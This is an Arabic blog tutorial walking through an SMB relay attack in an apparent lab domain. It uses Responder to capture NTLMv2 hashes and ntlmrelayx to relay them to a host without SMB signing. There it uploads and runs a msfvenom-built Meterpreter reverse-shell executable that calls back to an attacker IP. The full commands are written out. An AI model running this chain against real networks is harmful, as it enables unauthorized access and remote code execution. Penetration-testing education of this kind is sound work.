Relaying - SMB Relay

السلام عليكم ورحمة الله وبركاته

الحمد لله على جميع نِعمه علينا ما علمنا منها وما لم نعلم حمداً والصلاة والسلام على نبينا محمد اشرف الخلق والمرسلين, اما بعد:

مقدمة:

قبل البدأ في قراءة هذي المقالة يجب الاطلاع على المقالة السابقة LLMNR Poisoning

ايش هو الSMB Relaying:
 

الفكرة مشابهة لي المقالة السابقة لكن بفروقات بسيطة يأنه سوف ننفذ تكنيك  LLMNR Poisoning عن بأستخدام اداة Responder حتى نلتقط الهاش ومن ثم نمرره الى اداة Ntlmrelayx بدون الحاجة لكسر الهاش وهذا هو الذي يميز هذا التكنيك,  وNtlmrelayx سوف تستخدم هذا الهاش وتقوم بتسجيل الدخول فيه عن طريق بروتوكول smb لجميع الاجهزة الموجودة على الشبكة ولكن بشرط يجب ان يكون الـ SMB2 SIGNING ليس متطلب واذا تمكنت من الدخول على احد الاجهزة سوف تقوم برفع ملف ضار ( ـReverse Shell ) خاص بك وتنفيذه

الشرح:

في بداية الموضوع يجب علينا معرفة ماهي الاجهزة اللتي ليس لديها متطلب  SMB2 SIGNING  بأستخدام اداة CrackMapExec

نلاحظ مع بعض ان الايبي اللذي ينتهي برقم 13 الـSMB2 SIGNING ليست متطلب بالنسبة له

الان قبل ابدأ تشغيل اداة Responder وNtlmrelayx راح ننشأ ملف ضار عن بأستخدام اداة msfvenom عن طريق هذا الامر:

msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.100.117 LPORT=449 -f exe > rev.exe

الان سوف نذهب لملف Responder.conf ونقوم بالتعديل عليه وتبديل كلمة On الى Off بالنسبة لي الـsmb و الـhttp حتى لا يحدث تعارض بين اداة Ntlmrelayx و اداة Responder

الان راح نشغل اداة Responder واداة Ntlmrelayx بأستخدام هذي الاوامر:
 

python3 /usr/share/doc/python3-impacket/examples/ntlmrelayx.py -tf smb.txt -e rev.exe -smb2support

sudo python2 Responder.py -I eth0 -wv

الان سوف ننتظر حتى يقوم احد الاشخاص على الشبكة بالدخول على smb share غير موجود مثل: srv1.vuln.local\secret\\ او موقع غير موجود حتى نتلقط الـNTLMv2 الخاص فيه وتمريره الى الجهاز اللذي ينتهي الايبي الخاص به برقم 13

 بعد انتظار عشرة دقائق قام المستخدم Khalid بالبحث عن smb share غير موجود وتم تمرير الـNTLMv2 الخاص في المستخدم  Khalid الى الجهاز اللذي ينتهي الايبي الخاص به برقم 13 وتم تسجيل الدخول بنجاح ورفع الملف الضار والحصول على جلسة اختراق

وصلنا لنهاية المقالة

شاكر لكم